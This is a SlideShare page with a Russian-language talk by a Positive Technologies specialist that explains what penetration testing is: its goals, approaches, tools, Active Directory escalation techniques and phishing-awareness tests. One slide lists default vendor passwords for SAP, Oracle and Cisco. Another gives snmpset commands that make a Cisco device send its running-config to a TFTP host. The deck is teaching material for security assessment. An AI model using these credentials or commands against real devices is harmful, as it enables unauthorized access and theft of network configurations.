SlideShare a Scribd company logo

Что такое пентест

Download as PPT, PDF
Dmitry Evteev, profile picture
Dmitry Evteev

Документ посвящен тестированию на проникновение (пентест), описывая основные методы и подходы его проведения, включая внутренние и периметровые тестирования, а также анализ защищенности веб-приложений и сетей. В нем рассматриваются цели тестирования, такие как оценка процессов информационной безопасности, выявление уязвимостей и управление инцидентами. Кроме того, документ освещает инструменты, примеры тестов и проблемы, связанные с доступом и управлением безопасностью.

Technology
Related topics:
Penetration-Testing
1 of 25
Downloaded 254 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
Тестирование на проникновение Что такое ? Дмитрий Евтеев ( Positive Technologies)
Penetration testing internals Тестирование на проникновение != моделирование действий (не)реального злоумышленника Тестирование на проникновение != инструментальное сканирование с ручной верификацией уязвимостей Тестирование на проникновение – это комплекс мероприятий, направленных на оценку текущего состояния процессов обеспечения ИБ тестирование на преодоление защиты это один из методов проведения аудита ИБ
Методика С одной стороны это Open Source Security Testing Methodology Manual (OSSTMM) Web Application Security Consortium (WASC) Open Web Application Security Project (OWASP) … С другой стороны это Center of Internet Security (CIS) guides Стандарты серии ISO 2700x …
Возможности Механизм N … X Управление инцидентами Некоторые действия атакующей стороны были выявлены, но не были идентифицированы как атака. 2 Механизм N … X
Цели Высокоуровневые Внутренняя политика (пентест, как инструмент воздействия) Оценка текущего состояния процессов обеспечения ИБ Так надо ( compliance ) Технологические Осуществить НСД во внутреннюю сеть со стороны сети Интернет Получить максимальные привилегии в основных инфраструктурных системах ( Active Directory, сетевое оборудование, СУБД, ERP и пр.) Получить доступ к определенным информационным ресурсам Получить доступ к определенным данным (информации)
Подходы Периметровый пентест (с последующим развитием атаки во внутренней сети) С уведомлением и без уведомления администраторов Анализ защищенности беспроводных сетей Внутренний пентест С рабочего места среднестатистического пользователя сети Из выбранного сегмента сети Тестирование отдельного компонента информационной системы (анализ защищенности) Черный-, серый- белый-ящик Оценка осведомленности сотрудников компании в вопросах информационной безопасности
Реальная атака VS тестирование на проникновение Для непосредственного исполнителя пентест – это ВЗЛОМ! Ограничения Соблюдение законов РФ Ограниченное время Минимизация воздействия Отсутствие услуги тестирования типа DDoS Неудобства Согласование действий (порой это доходит до абсурда!) Ответственность / Аккуратность Преимущества Не нужно скрывать свою активность Упрощение процесса по идентификации периметра сети Возможность перехода к серому- и белому-ящику
Используемые инструменты Positive Technologies MaxPatrol Nmap/dnsenum/dig … … Immunity Canvas (VulnDisco, Agora Pack, Voip Pack) Metasploit … THC Hydra/THC PPTP bruter/ncrack … Cain and Abel/Wireshark Aircrack … Yersinia … Браузер, блокнот…
Проблема защиты Web -приложений Наиболее часто встречающиеся уязвимости веб-приложений при проведении анализа методом «черного ящика» (данные за 2009 год, http://ptsecurity.ru/analytics.asp )
Примеры пентестов : Web- приложения Что такое пентест веб-приложения методикой черного-ящика ? Web- сервер Рабочее место аудитора Проверка 1 Проверка N Найдена уязвимость Уязвимость 1: подбор пароля Impact: доступ к приложению (с ограниченными привилегиями) Уязвимость 2: внедрение операторов SQL Impact: только чтение файлов (включена опция magic quotes) Уязвимость 3: выход за каталог Impact: только чтение файлов (потенциально LFI) Уязвимость 4: предсказуемое значение идентификатора загружаемого файла Уязвимость 3 + Уязвимость 4 = Impact: выполнение команд на сервере Следующий шаг - РАЗВИТИЕ АТАКИ
Проблема слабых паролей Используется рекомендованная политика по заданию паролей Пароль администратора такого домена ? ( совпадает с логином )
Примеры пентестов : Подбор паролей (дефолты) Общепринятые admin:123456 Administrator:P@ssw0rd … SAP (DIAG) SAP*: 06071992, PASS манданты: 000, 001, 066, все новые (RFC) SAPCPIC: ADMIN манданты:000, 001, 066, все новые … Oracle sys:manager sys:change_on_install … Cisco Cisco:Cisco … …
Примеры пентестов : Привет Павлик :) snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host> snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6
Проблема разграничения доступа Сетевой доступ Архитектура сети (ДМЗ, технологическая сеть, пользовательский сегмент, тестовая среда) Удаленный доступ к сети Доступ к данным Общие ресурсы (пароли в открытом виде, резервные копии данных, различная чувствительная информация) Web- приложения, СУБД, ERP
Проблема управления доступом Разделение полномочий между администраторами Пользователи с повышенными привилегиями Сервисы (!) с не требуемым уровнем доступа Общая проблема управления идентификаторами
Примеры пентестов : Использование уязвимостей CANVAS && Metasploit
Примеры пентестов : Расширение привилегий в Active Directory Вариант 1 : Подбор пароля Вариант 2 : Использование уязвимостей в сервисах на контроллерах домена Вариант 3 : Проведение атаки Pass-the-hash Вариант 4: Создание нового пользователя с доменного компьютера, который посещает администратор домена Вариант 5 : Проведение атаки типа «Отравление ARP кэша» (например, перехват сессии RDP, понижение уровня проверки подлинности до LM ) Вариант 6: Проведение атаки NTLM Relay Вариант 7: Нахождение и восстановление system state домена (например, после успешной атаки на сервер резервного копирования) Вариант 8 : Получение расширенных привилегий за счет других систем (пример, контроль над записями в корневых DNS компании) Вариант 9 : Получение расширенных привилегий за счет уязвимостей других систем (хранение паролей с использованием обратимого шифрования, использование небезопасных протоколов и т.д.) Вариант N …
Примеры пентестов : Анализ защищенности Сканирование сети Успешно подобран пароль! Эксплуатация SQL Injection Выполнение команд на сервере Повышение привилегий Атака на внутренние ресурсы Внутренний пентест Установка сканера MaxPatrol Поиск уязвимостей Эксплуатация уязвимостей Перемещение в ИС ЦО Проведение атаки на ресурсы ЦО Получение максимальных привилегий во всей сети!
Примеры пентестов : Анализ защищенности
Примеры пентестов : Беспроводные сети
Примеры пентестов : Оценка эффективности программы повышения осведомленности Рассылка провоцирующих сообщений по электронной почте Рассылка провоцирующих сообщений с помощью системы ICQ (и других IM) Распространение носителей информации, содержащих провоцирующие данные Проведение опроса среди сотрудников Живой разговор (по телефону, skype )
Примеры пентестов : Пример набора проверок Описание сообщения Реализуемая атака Контролируемые события Сообщение от авторитетного лица, содержащее приложенный исполняемый файл. Распространение сетевых червей. Целевое заражение системы троянской программой. Открытие почтового сообщения. Запуск приложенного файла. Сообщение от внутреннего лица, содержащее ссылку на Web-сайт. Ссылка указывает на исполняемый файл. Атаки типа «фишинг». Распространение сетевых червей. Целевое заражение системы троянской программой. Использование уязвимостей ПО. Открытие почтового сообщения. Загрузка файла с Web-сервера. Запуск файла. Сообщение от авторитетного лица, содержащее ссылку на Web-сайт. Атаки типа «фишинг». Распространение сетевых червей. Целевое заражение системы троянской программой. Использование уязвимостей ПО. Открытие почтового сообщения. Переход по предложенной ссылке.
Примеры пентестов : Оценка эффективности программы повышения осведомленности
Резюме Тестирование на проникновение – это комплекс мероприятий, позволяющий провести эффективную оценку текущего состояния процессов обеспечения информационной безопасности Тестирование на проникновение – это поиск и использование недостатков в процессах обеспечения информационной безопасности управление уязвимостями управление конфигурациями управление инцидентами управление безопасностью веб-приложений, СУБД, ERP, проводными и беспроводными сетями и пр. etc
Спасибо за внимание! [email_address] http://devteev.blogspot.com/

More Related Content

PPTX
Тестирование на проникновение
Учебный центр "Эшелон"
 
PPTX
этичный хакинг и тестирование на проникновение (Publ)
Teymur Kheirkhabarov
 
PPTX
Этичный хакинг или пентестинг в действии
SQALab
 
DOC
Pentest Report Sample
Training center "Echelon"
 
PDF
Кто такой специалист по иб
Teymur Kheirkhabarov
 
PDF
тест на проникновение
a_a_a
 
DOC
PT Penetration Testing Report (sample)
Dmitry Evteev
 
PPT
Penetration testing (AS IS)
Dmitry Evteev
 
Тестирование на проникновение
Учебный центр "Эшелон"
 
этичный хакинг и тестирование на проникновение (Publ)
Teymur Kheirkhabarov
 
Этичный хакинг или пентестинг в действии
SQALab
 
Pentest Report Sample
Training center "Echelon"
 
Кто такой специалист по иб
Teymur Kheirkhabarov
 
тест на проникновение
a_a_a
 
PT Penetration Testing Report (sample)
Dmitry Evteev
 
Penetration testing (AS IS)
Dmitry Evteev
 

What's hot (20)

PDF
Практика обнаружения атак, использующих легальные инструменты
Sergey Soldatov
 
PPTX
Penetration testing
Training center "Echelon"
 
PDF
Охота на угрозы на BIS summit 2016
Sergey Soldatov
 
PPTX
Что общего у CTF и тестов на проникновение?
beched
 
PDF
Check Point. Сергей Чекрыгин. "На один шаг впереди"
Expolink
 
PPTX
Безопаность SAP-систем
Alexey Kachalin
 
PDF
Трудовые будни охотника на угрозы
Sergey Soldatov
 
PDF
Check Point. Сергей Чекрыгин. "На один шаг впереди"
Expolink
 
PDF
CheckPoint. Сергей Чекрыгин. "Check Pont. На шаг впереди"
Expolink
 
PDF
Check Point. Сергей Чекрыгин. "На шаг впереди"
Expolink
 
PPTX
PT ESC - кто полечит доктора?
Alexey Kachalin
 
PPTX
Audit intro
cnpo
 
PPTX
Cis critical security controls. контроль 3 безопасная конфигурация устройств
Teymur Kheirkhabarov
 
PPTX
Статистика по результатам тестирований на проникновение и анализа защищенност...
Dmitry Evteev
 
PPTX
Алгоритмы пентестов. BaltCTF 2012
beched
 
PPTX
SIEM для ИТ
Olesya Shelestova
 
PPT
Ломаем (и строим) вместе
Dmitry Evteev
 
PPTX
Решения и сервисы для обеспечения ИБ (ИБ Банков 2016)
Alexey Kachalin
 
PPTX
RuSIEM (15.11.2015)
Olesya Shelestova
 
PPT
Реальные опасности виртуального мира.
Dmitry Evteev
 
Практика обнаружения атак, использующих легальные инструменты
Sergey Soldatov
 
Penetration testing
Training center "Echelon"
 
Охота на угрозы на BIS summit 2016
Sergey Soldatov
 
Что общего у CTF и тестов на проникновение?
beched
 
Check Point. Сергей Чекрыгин. "На один шаг впереди"
Expolink
 
Безопаность SAP-систем
Alexey Kachalin
 
Трудовые будни охотника на угрозы
Sergey Soldatov
 
Check Point. Сергей Чекрыгин. "На один шаг впереди"
Expolink
 
CheckPoint. Сергей Чекрыгин. "Check Pont. На шаг впереди"
Expolink
 
Check Point. Сергей Чекрыгин. "На шаг впереди"
Expolink
 
PT ESC - кто полечит доктора?
Alexey Kachalin
 
Audit intro
cnpo
 
Cis critical security controls. контроль 3 безопасная конфигурация устройств
Teymur Kheirkhabarov
 
Статистика по результатам тестирований на проникновение и анализа защищенност...
Dmitry Evteev
 
Алгоритмы пентестов. BaltCTF 2012
beched
 
SIEM для ИТ
Olesya Shelestova
 
Ломаем (и строим) вместе
Dmitry Evteev
 
Решения и сервисы для обеспечения ИБ (ИБ Банков 2016)
Alexey Kachalin
 
RuSIEM (15.11.2015)
Olesya Shelestova
 
Реальные опасности виртуального мира.
Dmitry Evteev
 
Ad

Viewers also liked (20)

PDF
С чего начать свой путь этичного хакера?
Vadym_Chakrian
 
PPTX
Доклад на v воронежском форуме ver. 0.3
journalrubezh
 
PPTX
CodeFest 2012. Белов С. — Пентест на стероидах. Автоматизируем процесс
CodeFest
 
PDF
Mobile Device Security
qqlan
 
PPT
Pentest requirements
Glib Pakharenko
 
PDF
Alexey Sintsov - Where do the money lie
DefconRussia
 
PDF
Kaspersky SAS SCADA in the Cloud
qqlan
 
PPTX
Avoid the Hack
Jason Jakus
 
PPT
Defcon Moscow #0x0A - Dmitry Evteev "Pentest vs. APT"
Defcon Moscow
 
PPTX
Database honeypot by design
qqlan
 
PPTX
Web security
Sync.NET
 
PPTX
автоматизируем пентест Wifi сети
Olesya Shelestova
 
PDF
Wps pixie dust attack
invad3rsam
 
PDF
#root это только начало
Vlad Styran
 
PDF
Сканирование уязвимостей со вкусом Яндекса. Тарас Иващенко, Яндекс
yaevents
 
PPTX
Кое-что о Wi-Fi (Денис Жевнер)
IT Club Mykolayiv
 
PPTX
Wi Fi Security
yousef emami
 
PPTX
Опыт организации тестирования безопасности Web приложений в компании
SQALab
 
PPTX
Угадываем пароль за минуту
Positive Hack Days
 
PPTX
Тестирование уязвимостей веб приложений
SQALab
 
С чего начать свой путь этичного хакера?
Vadym_Chakrian
 
Доклад на v воронежском форуме ver. 0.3
journalrubezh
 
CodeFest 2012. Белов С. — Пентест на стероидах. Автоматизируем процесс
CodeFest
 
Mobile Device Security
qqlan
 
Pentest requirements
Glib Pakharenko
 
Alexey Sintsov - Where do the money lie
DefconRussia
 
Kaspersky SAS SCADA in the Cloud
qqlan
 
Avoid the Hack
Jason Jakus
 
Defcon Moscow #0x0A - Dmitry Evteev "Pentest vs. APT"
Defcon Moscow
 
Database honeypot by design
qqlan
 
Web security
Sync.NET
 
автоматизируем пентест Wifi сети
Olesya Shelestova
 
Wps pixie dust attack
invad3rsam
 
#root это только начало
Vlad Styran
 
Сканирование уязвимостей со вкусом Яндекса. Тарас Иващенко, Яндекс
yaevents
 
Кое-что о Wi-Fi (Денис Жевнер)
IT Club Mykolayiv
 
Wi Fi Security
yousef emami
 
Опыт организации тестирования безопасности Web приложений в компании
SQALab
 
Угадываем пароль за минуту
Positive Hack Days
 
Тестирование уязвимостей веб приложений
SQALab
 
Ad

Similar to Что такое пентест (20)

PPT
Развитие систем анализа защищенности. Взгляд в будущее!
Dmitry Evteev
 
PPTX
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
Dmitry Evteev
 
PPT
IBM Proventia IPS
Петр Королев
 
PPT
Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?
Expolink
 
PPTX
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
Denis Batrankov, CISSP
 
PDF
Check Point. Сергей Чекрыгин. "Check Pont. На шаг впереди"
Expolink
 
PDF
Визуализация взломов в собственной сети PAN
Альбина Минуллина
 
PPT
Занятие № 10. Учетные записи пользователей. Обслуживание дисков. Настройка па...
Aibek9
 
PDF
Check Point. Сергей Чекрыгин. "На один шаг впереди"
Expolink
 
PDF
17 способов проникновения во внутреннюю сеть компании
Aleksey Lukatskiy
 
PDF
Безмалый Владимир Федорович - Сервисы репутации в информационной безопасности
UISGCON
 
PPTX
RuSIEM 2016
Olesya Shelestova
 
PPTX
Check Point. Сергей Чекрыгин. "На один шаг впереди"
Expolink
 
PDF
FireEye - система защиты от целенаправленных атак
DialogueScience
 
PDF
Найти и обезвредить
Cisco Russia
 
PDF
Архитектура защищенного периметра
Cisco Russia
 
PDF
Использование передовых возможностей кибербезопасности.pdf
trenders
 
PDF
Борьба с вредоносным кодом: от базовых мер к целостной стратегии
Aleksey Lukatskiy
 
PPTX
Анализ ИБ и расследование инцидентов ИБ (учебный семинар)
Alexey Kachalin
 
PDF
CyberArk 21.10.2014
DialogueScience
 
Развитие систем анализа защищенности. Взгляд в будущее!
Dmitry Evteev
 
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
Dmitry Evteev
 
IBM Proventia IPS
Петр Королев
 
Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?
Expolink
 
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
Denis Batrankov, CISSP
 
Check Point. Сергей Чекрыгин. "Check Pont. На шаг впереди"
Expolink
 
Визуализация взломов в собственной сети PAN
Альбина Минуллина
 
Занятие № 10. Учетные записи пользователей. Обслуживание дисков. Настройка па...
Aibek9
 
Check Point. Сергей Чекрыгин. "На один шаг впереди"
Expolink
 
17 способов проникновения во внутреннюю сеть компании
Aleksey Lukatskiy
 
Безмалый Владимир Федорович - Сервисы репутации в информационной безопасности
UISGCON
 
RuSIEM 2016
Olesya Shelestova
 
Check Point. Сергей Чекрыгин. "На один шаг впереди"
Expolink
 
FireEye - система защиты от целенаправленных атак
DialogueScience
 
Найти и обезвредить
Cisco Russia
 
Архитектура защищенного периметра
Cisco Russia
 
Использование передовых возможностей кибербезопасности.pdf
trenders
 
Борьба с вредоносным кодом: от базовых мер к целостной стратегии
Aleksey Lukatskiy
 
Анализ ИБ и расследование инцидентов ИБ (учебный семинар)
Alexey Kachalin
 
CyberArk 21.10.2014
DialogueScience
 

More from Dmitry Evteev (20)

PPTX
Противодействие хищению персональных данных и платежной информации в сети Инт...
Dmitry Evteev
 
PPTX
penetest VS. APT
Dmitry Evteev
 
PPTX
Уязвимости систем ДБО в 2011-2012 гг.
Dmitry Evteev
 
PPTX
Истории из жизни. Как взламывают сети крупных организаций.
Dmitry Evteev
 
PPTX
Демонстрация атаки на ДБО
Dmitry Evteev
 
PPTX
Типовые проблемы безопасности банковских систем
Dmitry Evteev
 
PPTX
Услуги PT для банков
Dmitry Evteev
 
PPTX
PHDays 2012: Future Now
Dmitry Evteev
 
PPTX
Такой (не)безопасный веб
Dmitry Evteev
 
PPTX
Собираем команду хакеров
Dmitry Evteev
 
PPTX
Тестирование на проникновение в сетях Microsoft (v.2)
Dmitry Evteev
 
PPTX
Тестирование на проникновение в сетях Microsoft
Dmitry Evteev
 
PPT
PHDays CTF 2011 Quals/Afterparty: как это было
Dmitry Evteev
 
PPTX
Как взламывают сети государственных учреждений
Dmitry Evteev
 
PPT
Введение в тему безопасности веб-приложений
Dmitry Evteev
 
PPT
Практика проведения DDoS-тестирований
Dmitry Evteev
 
PPT
Мобильный офис глазами пентестера
Dmitry Evteev
 
PPT
Безопасность веб-приложений сегодня
Dmitry Evteev
 
PPT
CC HackQuest 2010 Full Disclosure (мастер-класс)
Dmitry Evteev
 
DOC
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Dmitry Evteev
 
Противодействие хищению персональных данных и платежной информации в сети Инт...
Dmitry Evteev
 
penetest VS. APT
Dmitry Evteev
 
Уязвимости систем ДБО в 2011-2012 гг.
Dmitry Evteev
 
Истории из жизни. Как взламывают сети крупных организаций.
Dmitry Evteev
 
Демонстрация атаки на ДБО
Dmitry Evteev
 
Типовые проблемы безопасности банковских систем
Dmitry Evteev
 
Услуги PT для банков
Dmitry Evteev
 
PHDays 2012: Future Now
Dmitry Evteev
 
Такой (не)безопасный веб
Dmitry Evteev
 
Собираем команду хакеров
Dmitry Evteev
 
Тестирование на проникновение в сетях Microsoft (v.2)
Dmitry Evteev
 
Тестирование на проникновение в сетях Microsoft
Dmitry Evteev
 
PHDays CTF 2011 Quals/Afterparty: как это было
Dmitry Evteev
 
Как взламывают сети государственных учреждений
Dmitry Evteev
 
Введение в тему безопасности веб-приложений
Dmitry Evteev
 
Практика проведения DDoS-тестирований
Dmitry Evteev
 
Мобильный офис глазами пентестера
Dmitry Evteev
 
Безопасность веб-приложений сегодня
Dmitry Evteev
 
CC HackQuest 2010 Full Disclosure (мастер-класс)
Dmitry Evteev
 
Chaos Constructions HackQuest 2010 Full Disclosure (мастер-класс)
Dmitry Evteev
 

Что такое пентест

  • 1. Тестирование на проникновение Что такое ? Дмитрий Евтеев ( Positive Technologies)
  • 2. Penetration testing internals Тестирование на проникновение != моделирование действий (не)реального злоумышленника Тестирование на проникновение != инструментальное сканирование с ручной верификацией уязвимостей Тестирование на проникновение – это комплекс мероприятий, направленных на оценку текущего состояния процессов обеспечения ИБ тестирование на преодоление защиты это один из методов проведения аудита ИБ
  • 3. Методика С одной стороны это Open Source Security Testing Methodology Manual (OSSTMM) Web Application Security Consortium (WASC) Open Web Application Security Project (OWASP) … С другой стороны это Center of Internet Security (CIS) guides Стандарты серии ISO 2700x …
  • 4. Возможности Механизм N … X Управление инцидентами Некоторые действия атакующей стороны были выявлены, но не были идентифицированы как атака. 2 Механизм N … X
  • 5. Цели Высокоуровневые Внутренняя политика (пентест, как инструмент воздействия) Оценка текущего состояния процессов обеспечения ИБ Так надо ( compliance ) Технологические Осуществить НСД во внутреннюю сеть со стороны сети Интернет Получить максимальные привилегии в основных инфраструктурных системах ( Active Directory, сетевое оборудование, СУБД, ERP и пр.) Получить доступ к определенным информационным ресурсам Получить доступ к определенным данным (информации)
  • 6. Подходы Периметровый пентест (с последующим развитием атаки во внутренней сети) С уведомлением и без уведомления администраторов Анализ защищенности беспроводных сетей Внутренний пентест С рабочего места среднестатистического пользователя сети Из выбранного сегмента сети Тестирование отдельного компонента информационной системы (анализ защищенности) Черный-, серый- белый-ящик Оценка осведомленности сотрудников компании в вопросах информационной безопасности
  • 7. Реальная атака VS тестирование на проникновение Для непосредственного исполнителя пентест – это ВЗЛОМ! Ограничения Соблюдение законов РФ Ограниченное время Минимизация воздействия Отсутствие услуги тестирования типа DDoS Неудобства Согласование действий (порой это доходит до абсурда!) Ответственность / Аккуратность Преимущества Не нужно скрывать свою активность Упрощение процесса по идентификации периметра сети Возможность перехода к серому- и белому-ящику
  • 8. Используемые инструменты Positive Technologies MaxPatrol Nmap/dnsenum/dig … … Immunity Canvas (VulnDisco, Agora Pack, Voip Pack) Metasploit … THC Hydra/THC PPTP bruter/ncrack … Cain and Abel/Wireshark Aircrack … Yersinia … Браузер, блокнот…
  • 9. Проблема защиты Web -приложений Наиболее часто встречающиеся уязвимости веб-приложений при проведении анализа методом «черного ящика» (данные за 2009 год, http://ptsecurity.ru/analytics.asp )
  • 10. Примеры пентестов : Web- приложения Что такое пентест веб-приложения методикой черного-ящика ? Web- сервер Рабочее место аудитора Проверка 1 Проверка N Найдена уязвимость Уязвимость 1: подбор пароля Impact: доступ к приложению (с ограниченными привилегиями) Уязвимость 2: внедрение операторов SQL Impact: только чтение файлов (включена опция magic quotes) Уязвимость 3: выход за каталог Impact: только чтение файлов (потенциально LFI) Уязвимость 4: предсказуемое значение идентификатора загружаемого файла Уязвимость 3 + Уязвимость 4 = Impact: выполнение команд на сервере Следующий шаг - РАЗВИТИЕ АТАКИ
  • 11. Проблема слабых паролей Используется рекомендованная политика по заданию паролей Пароль администратора такого домена ? ( совпадает с логином )
  • 12. Примеры пентестов : Подбор паролей (дефолты) Общепринятые admin:123456 Administrator:P@ssw0rd … SAP (DIAG) SAP*: 06071992, PASS манданты: 000, 001, 066, все новые (RFC) SAPCPIC: ADMIN манданты:000, 001, 066, все новые … Oracle sys:manager sys:change_on_install … Cisco Cisco:Cisco … …
  • 13. Примеры пентестов : Привет Павлик :) snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host> snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6
  • 14. Проблема разграничения доступа Сетевой доступ Архитектура сети (ДМЗ, технологическая сеть, пользовательский сегмент, тестовая среда) Удаленный доступ к сети Доступ к данным Общие ресурсы (пароли в открытом виде, резервные копии данных, различная чувствительная информация) Web- приложения, СУБД, ERP
  • 15. Проблема управления доступом Разделение полномочий между администраторами Пользователи с повышенными привилегиями Сервисы (!) с не требуемым уровнем доступа Общая проблема управления идентификаторами
  • 16. Примеры пентестов : Использование уязвимостей CANVAS && Metasploit
  • 17. Примеры пентестов : Расширение привилегий в Active Directory Вариант 1 : Подбор пароля Вариант 2 : Использование уязвимостей в сервисах на контроллерах домена Вариант 3 : Проведение атаки Pass-the-hash Вариант 4: Создание нового пользователя с доменного компьютера, который посещает администратор домена Вариант 5 : Проведение атаки типа «Отравление ARP кэша» (например, перехват сессии RDP, понижение уровня проверки подлинности до LM ) Вариант 6: Проведение атаки NTLM Relay Вариант 7: Нахождение и восстановление system state домена (например, после успешной атаки на сервер резервного копирования) Вариант 8 : Получение расширенных привилегий за счет других систем (пример, контроль над записями в корневых DNS компании) Вариант 9 : Получение расширенных привилегий за счет уязвимостей других систем (хранение паролей с использованием обратимого шифрования, использование небезопасных протоколов и т.д.) Вариант N …
  • 18. Примеры пентестов : Анализ защищенности Сканирование сети Успешно подобран пароль! Эксплуатация SQL Injection Выполнение команд на сервере Повышение привилегий Атака на внутренние ресурсы Внутренний пентест Установка сканера MaxPatrol Поиск уязвимостей Эксплуатация уязвимостей Перемещение в ИС ЦО Проведение атаки на ресурсы ЦО Получение максимальных привилегий во всей сети!
  • 19. Примеры пентестов : Анализ защищенности
  • 20. Примеры пентестов : Беспроводные сети
  • 21. Примеры пентестов : Оценка эффективности программы повышения осведомленности Рассылка провоцирующих сообщений по электронной почте Рассылка провоцирующих сообщений с помощью системы ICQ (и других IM) Распространение носителей информации, содержащих провоцирующие данные Проведение опроса среди сотрудников Живой разговор (по телефону, skype )
  • 22. Примеры пентестов : Пример набора проверок Описание сообщения Реализуемая атака Контролируемые события Сообщение от авторитетного лица, содержащее приложенный исполняемый файл. Распространение сетевых червей. Целевое заражение системы троянской программой. Открытие почтового сообщения. Запуск приложенного файла. Сообщение от внутреннего лица, содержащее ссылку на Web-сайт. Ссылка указывает на исполняемый файл. Атаки типа «фишинг». Распространение сетевых червей. Целевое заражение системы троянской программой. Использование уязвимостей ПО. Открытие почтового сообщения. Загрузка файла с Web-сервера. Запуск файла. Сообщение от авторитетного лица, содержащее ссылку на Web-сайт. Атаки типа «фишинг». Распространение сетевых червей. Целевое заражение системы троянской программой. Использование уязвимостей ПО. Открытие почтового сообщения. Переход по предложенной ссылке.
  • 23. Примеры пентестов : Оценка эффективности программы повышения осведомленности
  • 24. Резюме Тестирование на проникновение – это комплекс мероприятий, позволяющий провести эффективную оценку текущего состояния процессов обеспечения информационной безопасности Тестирование на проникновение – это поиск и использование недостатков в процессах обеспечения информационной безопасности управление уязвимостями управление конфигурациями управление инцидентами управление безопасностью веб-приложений, СУБД, ERP, проводными и беспроводными сетями и пр. etc
  • 25. Спасибо за внимание! [email_address] http://devteev.blogspot.com/